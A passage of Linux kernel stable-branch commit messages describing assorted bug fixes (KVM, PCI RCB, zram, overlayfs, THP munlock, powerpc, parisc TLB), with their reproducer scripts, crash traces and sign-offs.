Signed-off-by: James Morse <james.morse@arm.com>
Cc: Suzuki K Poulose <suzuki.poulose@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
[Removed enable() hunks for A53 workaround]
Signed-off-by: James Morse <james.morse@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e13258f38e upstream.
The throughput meter detects different situations as problems for the
current test. It stops the test after these and reports it to userspace.
This also has to be done when the primary interface disappeared during the
test.
Fixes: 33a3bb4a33 ("batman-adv: throughput meter implementation")
Reported-by: Joe Perches <joe@perches.com>
Signed-off-by: Sven Eckelmann <sven@narfation.org>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ac95330b96 upstream.
commit cfa6368860 ("clk: sunxi: factors: Consolidate get_factors
parameters into a struct") introduced a regression for m factor
computation in sun4i_get_apb1_factors function.
The old code reassigned the "parent_rate" parameter to the targeted
divisor value and was buggy for the returned frequency but not for the
computed factors. Now, returned frequency is good but m factor is
incorrectly computed (its max value 31 is always set resulting in a
significantly slower frequency than the requested one...)
This patch simply restores the original proper computation for m while
keeping the good changes for returned rate.
Fixes: cfa6368860 ("clk: sunxi: factors: Consolidate get_factors parameters into a struct")
Signed-off-by: Stéphan Rafin <stephan@soliotek.com>
Signed-off-by: Maxime Ripard <maxime.ripard@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5ad45307d9 upstream.
The probe function requests the interrupt before initializing
the ddp component. Which leads to a null pointer dereference at boot.
Fix this by requesting the interrput after all components got
initialized properly.
Fixes: 119f517362 ("drm/mediatek: Add DRM Driver for Mediatek SoC MT8173.")
Signed-off-by: Matthias Brugger <matthias.bgg@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Change-Id: I57193a7ab554dfb37c35a455900689333adf511c
commit 0e1614ac84 upstream.
Make sure to drop the reference to the parent device taken by
class_find_device() after "unexporting" any children when deregistering
a PWM chip.
Fixes: 0733424c9b ("pwm: Unexport children before chip removal")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Thierry Reding <thierry.reding@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a0f1d21c1c upstream.
We should move the ops->destroy(dev) after the list_del(&dev->vm_node)
so that we don't use "dev" after freeing it.
Fixes: a28ebea2ad ("KVM: Protect device ops->create and list_add with kvm->lock")
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Reviewed-by: David Hildenbrand <david@redhat.com>
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 909e481e24 upstream.
The core and the cluster sleep state entry latencies can't be same as
cluster sleep involves more work compared to core level e.g. shared
cache maintenance.
Experiments have shown on an average about 100us more latency for the
cluster sleep state compared to the core level sleep. This patch fixes
the entry latency for the cluster sleep state.
Fixes: 28e10a8f3a ("arm64: dts: juno: Add idle-states to device tree")
Cc: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Cc: "Jon Medhurst (Tixy)" <tixy@linaro.org>
Reviewed-by: Liviu Dudau <Liviu.Dudau@arm.com>
Signed-off-by: Sudeep Holla <sudeep.holla@arm.com>
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bcfdd5d510 upstream.
The ATPX method does not always exist on the dGPU, it may be located at
the iGPU. The parent device of the iGPU is the root port for which
bridge_d3 is false. This accidentally enables the legacy PM method which
conflicts with port PM and prevented the dGPU from powering on.
Ported from amdgpu commit:
drm/amdgpu: fix check for port PM availability
from Peter Wu.
Fixes: d3ac31f3b4 (drm/radeon: fix power state when port pm is unavailable (v2))
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Cc: Peter Wu <peter@lekensteyn.nl>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7ac33e47d5 upstream.
The ATPX method does not always exist on the dGPU, it may be located at
the iGPU. The parent device of the iGPU is the root port for which
bridge_d3 is false. This accidentally enables the legacy PM method which
conflicts with port PM and prevented the dGPU from powering on.
Fixes: 1db4496f16 ("drm/amdgpu: fix power state when port pm is unavailable")
Reported-and-tested-by: Mike Lothian <mike@fireburn.co.uk>
Signed-off-by: Peter Wu <peter@lekensteyn.nl>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d3ac31f3b4 upstream.
When PCIe port PM is not enabled (system BIOS is pre-2015 or the
pcie_port_pm=off parameter is set), legacy ATPX PM should still be
marked as supported. Otherwise the GPU can fail to power on after
runtime suspend. This affected a Dell Inspiron 5548.
Ideally the BIOS date in the PCI core is lowered to 2013 (the first year
where hybrid graphics platforms using power resources was introduced),
but that seems more risky at this point and would not solve the
pcie_port_pm=off issue.
v2: agd: fix typo
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=98505
Signed-off-by: Peter Wu <peter@lekensteyn.nl>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Reviewed-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1db4496f16 upstream.
When PCIe port PM is not enabled (system BIOS is pre-2015 or the
pcie_port_pm=off parameter is set), legacy ATPX PM should still be
marked as supported. Otherwise the GPU can fail to power on after
runtime suspend. This affected a Dell Inspiron 5548.
Ideally the BIOS date in the PCI core is lowered to 2013 (the first year
where hybrid graphics platforms using power resources was introduced),
but that seems more risky at this point and would not solve the
pcie_port_pm=off issue.
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=98505
Reported-and-tested-by: Nayan Deshmukh <nayan26deshmukh@gmail.com>
Signed-off-by: Peter Wu <peter@lekensteyn.nl>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Acked-by: Christian König <christian.koenig@amd.com>
Reviewed-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8ca18eec2b upstream.
When we inject a level triggerered interrupt (and unless it
is backed by the physical distributor - timer style), we request
a maintenance interrupt. Part of the processing for that interrupt
is to feed to the rest of KVM (and to the eventfd subsystem) the
information that the interrupt has been EOIed.
But that notification only makes sense for SPIs, and not PPIs
(such as the PMU interrupt). Skip over the notification if
the interrupt is not an SPI.
Fixes: 140b086dd1 ("KVM: arm/arm64: vgic-new: Add GICv2 world switch backend")
Fixes: 59529f69f5 ("KVM: arm/arm64: vgic-new: Add GICv3 world switch backend")
Reported-by: Catalin Marinas <catalin.marinas@arm.com>
Tested-by: Catalin Marinas <catalin.marinas@arm.com>
Acked-by: Christoffer Dall <christoffer.dall@linaro.org>
Signed-off-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fcd2042e8d upstream.
SSIDs aren't guaranteed to be 0-terminated. Let's cap the max length
when we print them out.
This can be easily noticed by connecting to a network with a 32-octet
SSID:
[ 3903.502925] mwifiex_pcie 0000:01:00.0: info: trying to associate to
'0123456789abcdef0123456789abcdef <uninitialized mem>' bssid
xx:xx:xx:xx:xx:xx
Fixes: 5e6e3a92b9 ("wireless: mwifiex: initial commit for Marvell mwifiex driver")
Signed-off-by: Brian Norris <briannorris@chromium.org>
Acked-by: Amitkumar Karwar <akarwar@marvell.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e42010d820 upstream.
Per PCIe spec r3.0, sec 2.3.1.1, the Read Completion Boundary (RCB)
determines the naturally aligned address boundaries on which a Read Request
may be serviced with multiple Completions:
- For a Root Complex, RCB is 64 bytes or 128 bytes
This value is reported in the Link Control Register
Note: Bridges and Endpoints may implement a corresponding command bit
which may be set by system software to indicate the RCB value for the
Root Complex, allowing the Bridge/Endpoint to optimize its behavior
when the Root Complex’s RCB is 128 bytes.
- For all other system elements, RCB is 128 bytes
Per sec 7.8.7, if a Root Port only supports a 64-byte RCB, the RCB of all
downstream devices must be clear, indicating an RCB of 64 bytes. If the
Root Port supports a 128-byte RCB, we may optionally set the RCB of
downstream devices so they know they can generate larger Completions.
Some BIOSes supply an _HPX that tells us to set RCB, even though the Root
Port doesn't have RCB set, which may lead to Malformed TLP errors if the
Endpoint generates completions larger than the Root Port can handle.
The IBM x3850 X6 with BIOS version -[A8E120CUS-1.30]- 08/22/2016 supplies
such an _HPX and a Mellanox MT27500 ConnectX-3 device fails to initialize:
mlx4_core 0000:41:00.0: command 0xfff timed out (go bit not cleared)
mlx4_core 0000:41:00.0: device is going to be reset
mlx4_core 0000:41:00.0: Failed to obtain HW semaphore, aborting
mlx4_core 0000:41:00.0: Fail to reset HCA
------------[ cut here ]------------
kernel BUG at drivers/net/ethernet/mellanox/mlx4/catas.c:193!
After 6cd33649fa ("PCI: Add pci_configure_device() during enumeration")
and 7a1562d4f2 ("PCI: Apply _HPX Link Control settings to all devices
with a link"), we apply _HPX settings to *all* devices, not just those
hot-added after boot.
Before 7a1562d4f2, we didn't touch the Mellanox RCB, and the device
worked. After 7a1562d4f2, we set its RCB to 128, and it failed.
Set the RCB to 128 iff the Root Port supports a 128-byte RCB. Otherwise,
set RCB to 64 bytes. This effectively ignores what _HPX tells us about
RCB.
Note that this change only affects _HPX handling. If we have no _HPX, this
does nothing with RCB.
[bhelgaas: changelog, clear RCB if not set for Root Port]
Fixes: 6cd33649fa ("PCI: Add pci_configure_device() during enumeration")
Fixes: 7a1562d4f2 ("PCI: Apply _HPX Link Control settings to all devices with a link")
Link: https://bugzilla.kernel.org/show_bug.cgi?id=187781
Tested-by: Frank Danapfel <fdanapfe@redhat.com>
Signed-off-by: Johannes Thumshirn <jthumshirn@suse.de>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Acked-by: Myron Stowe <myron.stowe@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e9fb7cc638 upstream.
BYD automatic protocol detection is extremely unreliable and is often
triggers false positives on regular mice, Sentelic touchpads, and other
devices. BYD has several documents that have recommended detection
sequence, but they conflict with each other and, as far as I can see, still
would not produce unique enough output to reliably differentiate BYD from
other PS/2 devices.
OEMs sourcing BYD devices also do not do us any favors by not supplying any
reasonable DMI data and instead leaving turds like "To Be Filled By O.E.M."
in place of vendor data, or "System Serial Number" as serial number.
On top of that BYD is not truly modern multitouch controller, but rather a
single-touch transitional device that only reports absolute coordinates at
the beginning of finger contact and then reverts to reporting
displacements, and thus not very precise; the only benefit from using BYD
mode vs the legacy PS/2 mode is possibility of edge scrolling.
Given the above, and the fact that BYD devices are somewhat uncommon, let's
disable automatic detection of BYD devices. Users who know they have BYD
trackpads or want to experiment can attempt to activate BYD protocol via
sysfs:
echo -n "byd" > /sys/bus/serio/devices/serio1/drvctl
Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=151691
Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=175421
Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=120781
Fixes: https://bugzilla.kernel.org/show_bug.cgi?id=121281
Fixes: 98ee377144 ("Input: byd - add BYD PS/2 touchpad driver")
Reviewed-by: Pali Rohár <pali.rohar@gmail.com>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c4fcfc1619 upstream.
Handling of recursion in d_real() is completely broken. Recursion is only
done in the 'inode != NULL' case. But when opening the file we have
'inode == NULL' hence d_real() will return an overlay dentry. This won't
work since overlayfs doesn't define its own file operations, so all file
ops will fail.
Fix by doing the recursion first and the check against the inode second.
Bash script to reproduce the issue written by Quentin:
- 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - -
tmpdir=$(mktemp -d)
pushd ${tmpdir}
mkdir -p {upper,lower,work}
echo -n 'rocks' > lower/ksplice
mount -t overlay level_zero upper -o lowerdir=lower,upperdir=upper,workdir=work
cat upper/ksplice
tmpdir2=$(mktemp -d)
pushd ${tmpdir2}
mkdir -p {upper,work}
mount -t overlay level_one upper -o lowerdir=${tmpdir}/upper,upperdir=upper,workdir=work
ls -l upper/ksplice
cat upper/ksplice
- 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - -
Reported-by: Quentin Casasnovas <quentin.casasnovas@oracle.com>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Fixes: 2d902671ce ("vfs: merge .d_select_inode() into .d_real()")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 529e71e164 upstream.
The zram hot removal code calls idr_remove() even when zram_remove()
returns an error (typically -EBUSY). This results in a leftover at the
device release, eventually leading to a crash when the module is
reloaded.
As described in the bug report below, the following procedure would
cause an Oops with zram:
- provision three zram devices via modprobe zram num_devices=3
- configure a size for each device
+ echo "1G" > /sys/block/$zram_name/disksize
- mkfs and mount zram0 only
- attempt to hot remove all three devices
+ echo 2 > /sys/class/zram-control/hot_remove
+ echo 1 > /sys/class/zram-control/hot_remove
+ echo 0 > /sys/class/zram-control/hot_remove
- zram0 removal fails with EBUSY, as expected
- unmount zram0
- try zram0 hot remove again
+ echo 0 > /sys/class/zram-control/hot_remove
- fails with ENODEV (unexpected)
- unload zram kernel module
+ completes successfully
- zram0 device node still exists
- attempt to mount /dev/zram0
+ mount command is killed
+ following BUG is encountered
BUG: unable to handle kernel paging request at ffffffffa0002ba0
IP: get_disk+0x16/0x50
Oops: 0000 [#1] SMP
CPU: 0 PID: 252 Comm: mount Not tainted 4.9.0-rc6 #176
Call Trace:
exact_lock+0xc/0x20
kobj_lookup+0xdc/0x160
get_gendisk+0x2f/0x110
__blkdev_get+0x10c/0x3c0
blkdev_get+0x19d/0x2e0
blkdev_open+0x56/0x70
do_dentry_open.isra.19+0x1ff/0x310
vfs_open+0x43/0x60
path_openat+0x2c9/0xf30
do_filp_open+0x79/0xd0
do_sys_open+0x114/0x1e0
SyS_open+0x19/0x20
entry_SYSCALL_64_fastpath+0x13/0x94
This patch adds the proper error check in hot_remove_store() not to call
idr_remove() unconditionally.
Fixes: 17ec4cd985 ("zram: don't call idr_remove() from zram_remove()")
Bugzilla: https://bugzilla.opensuse.org/show_bug.cgi?id=1010970
Link: http://lkml.kernel.org/r/20161121132140.12683-1-tiwai@suse.de
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Reviewed-by: David Disseldorp <ddiss@suse.de>
Reported-by: David Disseldorp <ddiss@suse.de>
Tested-by: David Disseldorp <ddiss@suse.de>
Acked-by: Minchan Kim <minchan@kernel.org>
Acked-by: Sergey Senozhatsky <sergey.senozhatsky@gmail.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 655548bf62 upstream.
The following program triggers BUG() in munlock_vma_pages_range():
// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include <sys/mman.h>
int main()
{
mmap((void*)0x20105000ul, 0xc00000ul, 0x2ul, 0x2172ul, -1, 0);
mremap((void*)0x201fd000ul, 0x4000ul, 0xc00000ul, 0x3ul, 0x203f0000ul);
return 0;
}
The test-case constructs the situation when munlock_vma_pages_range()
finds PTE-mapped THP-head in the middle of page table and, by mistake,
skips HPAGE_PMD_NR pages after that.
As result, on the next iteration it hits the middle of PMD-mapped THP
and gets upset seeing mlocked tail page.
The solution is only skip HPAGE_PMD_NR pages if the THP was mlocked
during munlock_vma_page(). It would guarantee that the page is
PMD-mapped as we never mlock PTE-mapeed THPs.
Fixes: e90309c9f7 ("thp: allow mlocked THP again")
Link: http://lkml.kernel.org/r/20161115132703.7s7rrgmwttegcdh4@black.fi.intel.com
Signed-off-by: Kirill A. Shutemov <kirill.shutemov@linux.intel.com>
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Cc: Konstantin Khlebnikov <koct9i@gmail.com>
Cc: Andrey Ryabinin <aryabinin@virtuozzo.com>
Cc: syzkaller <syzkaller@googlegroups.com>
Cc: Andrea Arcangeli <aarcange@redhat.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e1465d125d upstream.
Commit b46e756f5e ("thp: extract khugepaged from mm/huge_memory.c")
moved code from huge_memory.c to khugepaged.c. Some of this code should
be compiled only when CONFIG_SYSFS is enabled but the condition around
this code was not moved into khugepaged.c.
The result is a compilation error when CONFIG_SYSFS is disabled:
mm/built-in.o: In function `khugepaged_defrag_store': khugepaged.c:(.text+0x2d095): undefined reference to `single_hugepage_flag_store'
mm/built-in.o: In function `khugepaged_defrag_show': khugepaged.c:(.text+0x2d0ab): undefined reference to `single_hugepage_flag_show'
This commit adds the #ifdef CONFIG_SYSFS around the code related to
sysfs.
Link: http://lkml.kernel.org/r/20161114203448.24197-1-jeremy.lefaure@lse.epita.fr
Signed-off-by: Jérémy Lefaure <jeremy.lefaure@lse.epita.fr>
Acked-by: Kirill A. Shutemov <kirill.shutemov@linux.intel.com>
Acked-by: Hillf Danton <hillf.zj@alibaba-inc.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3c7c7a2fc8 upstream.
Apparenty this is coming in the way of gcc fix which inhibits the usage
of LP_COUNT as a gpr.
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6a8b2ca702 upstream.
commit 1c3c909303 broke PAE40. Macro pfn_pte(pfn, prot) creates paddr
from pfn, but the page shift was getting truncated to 32 bits since we lost
the proper cast to 64 bits (for PAE400
Instead of reverting that commit, use a better helper which is 32/64 bits
safe just like ARM implementation.
Fixes: 1c3c909303 ("ARC: mm: fix build breakage with STRICT_MM_TYPECHECKS")
Signed-off-by: Yuriy Kolerov <yuriy.kolerov@synopsys.com>
[vgupta: massaged changelog]
Signed-off-by: Vineet Gupta <vgupta@synopsys.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 208da78e8e upstream.
Commit 540eb1eef0 ("scsi: libfc: fix seconds_since_last_reset calculation")
removed the use of 'struct timespec' from fc_get_host_stats(). This broke the
output of 'fcoeadm -s' after kernel 4.8-rc1.
Signed-off-by: Johannes Thumshirn <jthumshirn@suse.de>
Fixes: 540eb1eef0 ("scsi: libfc: fix seconds_since_last_reset calculation")
Acked-by: Arnd Bergmann <arnd@arndb.de>
Reviewed-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7630b3a599 upstream.
Older controllers use SCSI target id '0' for the first internal disk. As
the controllers are now placed on the same bus as the internal disks
this leads to a clash with the SCSI target id of controller. This patch
checks the SCSI revision, and moves older controller to bus '3' to be
compatible with older releases and avoid this problem.
[mkp: fixed uninitialized variable]
Fixes: 09371d623c ("hpsa: Change SAS transport devices to bus 0.")
Signed-off-by: Hannes Reinecke <hare@suse.com>
Acked-by: Don Brace <don.brace@microsemi.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e0029dcb5b upstream.
There's a typo in ata_gen_passthru_sense(), where the first byte
would be overwritten incorrectly later on.
Reported-by: Charles Machalow <csm10495@gmail.com>
Signed-off-by: Hannes Reinecke <hare@suse.com>
Fixes: 11093cb1ef ("libata-scsi: generate correct ATA pass-through sense")
Signed-off-by: Tejun Heo <tj@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7ff723ad0f upstream.
While issuing any ATA passthrough command to firmware the driver will
block the device. But it will unblock the device only if the I/O
completes through the ISR path. If a controller reset occurs before
command completion the device will remain in blocked state.
Make sure we unblock the device following a controller reset if an ATA
passthrough command was queued.
[mkp: clarified patch description]
Fixes: ac6c2a93bd07 ("mpt3sas: Fix for SATA drive in blocked state, after diag reset")
Signed-off-by: Suganath Prabu S <suganath-prabu.subramani@broadcom.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c9b8af1330 upstream.
Andre Noll reported panics after my recent fix (commit 34fad54c25
"net: __skb_flow_dissect() must cap its return value")
After some more headaches, Alexander root caused the problem to
init_default_flow_dissectors() being called too late, in case
a network driver like IGB is not a module and receives DHCP message
very early.
Fix is to call init_default_flow_dissectors() much earlier,
as it is a core infrastructure and does not depend on another
kernel service.
Fixes: 06635a35d1 ("flow_dissect: use programable dissector in skb_flow_dissect and friends")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andre Noll <maan@tuebingen.mpg.de>
Diagnosed-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
31e49bfda1 ("mm, oom: protect !costly allocations some more for
!CONFIG_COMPACTION") was an attempt to reduce chances of pre-mature OOM
killer invocation for high order requests. It seemed to work for most
users just fine but it is far from bullet proof and obviously not
sufficient for Marc who has reported pre-mature OOM killer invocations
with 4.8 based kernels. 4.9 will all the compaction improvements seems
to be behaving much better but that would be too intrusive to backport
to 4.8 stable kernels. Instead this patch simply never declares OOM for
!costly high order requests. We rely on order-0 requests to do that in
case we are really out of memory. Order-0 requests are much more common
and so a risk of a livelock without any way forward is highly unlikely.
Reported-by: Marc MERLIN <marc@merlins.org>
Tested-by: Marc MERLIN <marc@merlins.org>
Signed-off-by: Michal Hocko <mhocko@suse.com>
commit 5499a6b22e upstream.
Since commit 6f3b911d5f ("can: bcm: add support for CAN FD frames") the
CAN broadcast manager supports CAN and CAN FD data frames.
As these data frames are embedded in struct can[fd]_frames which have a
different length the access to the provided array of CAN frames became
dependend of op->cfsiz. By using a struct canfd_frame pointer for the array of
CAN frames the new offset calculation based on op->cfsiz was accidently applied
to CAN FD frame element lengths.
This fix makes the pointer to the arrays of the different CAN frame types a
void pointer so that the offset calculation in bytes accesses the correct CAN
frame elements.
Reference: http://marc.info/?l=linux-netdev&m=147980658909653
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Oliver Hartkopp <socketcan@hartkopp.net>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a1ff57416a upstream.
When configured with CONFIG_PPC_EARLY_DEBUG_OPAL=y the kernel expects
the OPAL entry and base addresses to be passed in r8 and r9
respectively. Currently the wrapper does not attempt to restore these
values before entering the decompressed kernel which causes the kernel
to branch into whatever happens to be in r9 when doing a write to the
OPAL console in early boot.
This patch adds a platform_ops hook that can be used to branch into the
new kernel. The OPAL console driver patches this at runtime so that if
the console is used it will be restored just prior to entering the
kernel.
Fixes: 656ad58ef1 ("powerpc/boot: Add OPAL console to epapr wrappers")
Signed-off-by: Oliver O'Halloran <oohall@gmail.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 984d7a1ec6 upstream.
With commit e58e87adc8 ("powerpc/mm: Update _PAGE_KERNEL_RO") we
started using the ppp value 0b110 to map kernel readonly. But that
facility was only added as part of ISA 2.04. For earlier ISA version
only supported ppp bit value for readonly mapping is 0b011. (This
implies both user and kernel get mapped using the same ppp bit value for
readonly mapping.).
Update the code such that for earlier architecture version we use ppp
value 0b011 for readonly mapping. We don't differentiate between power5+
and power5 here and apply the new ppp bits only from power6 (ISA 2.05).
This keep the changes minimal.
This fixes issue with PS3 spu usage reported at
https://lkml.kernel.org/r/rep.1421449714.geoff@infradead.org
Fixes: e58e87adc8 ("powerpc/mm: Update _PAGE_KERNEL_RO")
Tested-by: Geoff Levand <geoff@infradead.org>
Signed-off-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7a43906f5c upstream.
There is a new bit, LPCR_PECE_HVEE (Hypervisor Virtualization Exit
Enable), which controls wakeup from STOP states on Hypervisor
Virtualization Interrupts (which happen to also be all external
interrupts in host or bare metal mode).
It needs to be set or we will miss wakeups.
Fixes: 9baaef0a22 ("powerpc/irq: Add support for HV virtualization interrupts")
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
[mpe: Rename it to HVEE to match the name in the ISA]
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4cb19355ea upstream.
The device-dax implementation originally tried to be tricky and allow
private read-only mappings, but in the process allowed writable
MAP_PRIVATE + MAP_NORESERVE mappings. For simplicity and predictability
just fail all private mapping attempts since device-dax memory is
statically allocated and will never support overcommit.
Cc: Dave Hansen <dave.hansen@linux.intel.com>
Fixes: dee4107924 ("/dev/dax, core: file operations and dax-mmap")
Reported-by: Pawel Lebioda <pawel.lebioda@intel.com>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6a84fb4b4e upstream.
If the dax_pmem driver is passed a resource that is already busy the
driver probe attempt should fail with a message like the following:
dax_pmem dax0.1: could not reserve region [mem 0x100000000-0x11fffffff]
However, if we do not catch the error we crash for the obvious reason of
accessing memory that is not mapped.
BUG: unable to handle kernel paging request at ffffc90020001000
IP: [<ffffffff81496712>] __memcpy+0x12/0x20
[..]
Call Trace:
[<ffffffff815c4960>] ? nsio_rw_bytes+0x60/0x180
[<ffffffff815c6045>] nd_pfn_validate+0x75/0x320
[<ffffffff815c63a9>] nvdimm_setup_pfn+0xb9/0x5d0
[<ffffffff815c48ef>] ? devm_nsio_enable+0xff/0x110
[<ffffffff815cb699>] dax_pmem_probe+0x59/0x260
Fixes: ab68f26221 ("/dev/dax, pmem: direct access to persistent memory")
Reported-by: Dave Hansen <dave.hansen@linux.intel.com>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 22a1e7783e upstream.
The commit 8dfbcc4351 ("[media] xc2028: avoid use after free") tried
to address the reported use-after-free by clearing the reference.
However, it's clearing the wrong pointer; it sets NULL to
priv->ctrl.fname, but it's anyway overwritten by the next line
memcpy(&priv->ctrl, p, sizeof(priv->ctrl)).
OTOH, the actual code accessing the freed string is the strcmp() call
with priv->fname:
if (!firmware_name[0] && p->fname &&
priv->fname && strcmp(p->fname, priv->fname))
free_firmware(priv);
where priv->fname points to the previous file name, and this was
already freed by kfree().
For fixing the bug properly, this patch does the following:
- Keep the copy of firmware file name in only priv->fname,
priv->ctrl.fname isn't changed;
- The allocation is done only when the firmware gets loaded;
- The kfree() is called in free_firmware() commonly
Fixes: commit 8dfbcc4351 ('[media] xc2028: avoid use after free')
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b0921d5c9e upstream.
Since commit 87a18a6a56 ("mmc: mmc: Use ->card_busy() to detect busy
cards in __mmc_switch()") the ESDHC driver is broken:
mmc0: Card stuck in programming state! __mmc_switch
mmc0: error -110 whilst initialising MMC card
Since this commit __mmc_switch() uses ->card_busy(), which is
sdhci_card_busy() for the esdhc driver. sdhci_card_busy() uses the
PRESENT_STATE register, specifically the DAT0 signal level bit. But the
ESDHC uses a non-conformant PRESENT_STATE register, thus a read fixup is
required to make the driver work again.
Signed-off-by: Michael Walle <michael@walle.cc>
Fixes: 87a18a6a56 ("mmc: mmc: Use ->card_busy() to detect busy cards in __mmc_switch()")
Acked-by: Yangbo Lu <yangbo.lu@nxp.com>
Acked-by: Adrian Hunter <adrian.hunter@intel.com>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5035b230e7 upstream.
This is the second issue I noticed in reviewing the parisc TLB code.
The fic instruction may use either the instruction or data TLB in
flushing the instruction cache. Thus, on machines with a split TLB, we
should also flush the data TLB after setting up the temporary alias
registers.
Although this has no functional impact, I changed the pdtlb and pitlb
instructions to consistently use the index register %r0. These
instructions do not support integer displacements.
Tested on rp3440 and c8000.
Signed-off-by: John David Anglin <dave.anglin@bell.net>
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c0452fb9fb upstream.
We are still troubled by occasional random segmentation faults and
memory memory corruption on SMP machines. The causes quite a few
package builds to fail on the Debian buildd machines for parisc. When
gcc-6 failed to build three times in a row, I looked again at the TLB
related code. I found a couple of issues. This is the first.
In general, we need to ensure page table updates and corresponding TLB
purges are atomic. The attached patch fixes an instance in pci-dma.c
where the page table update was not guarded by the TLB lock.
Tested on rp3440 and c8000. So far, no further random segmentation
faults have been observed.
Signed-off-by: John David Anglin <dave.anglin@bell.net>
Signed-off-by: Helge Deller <deller@gmx.de>
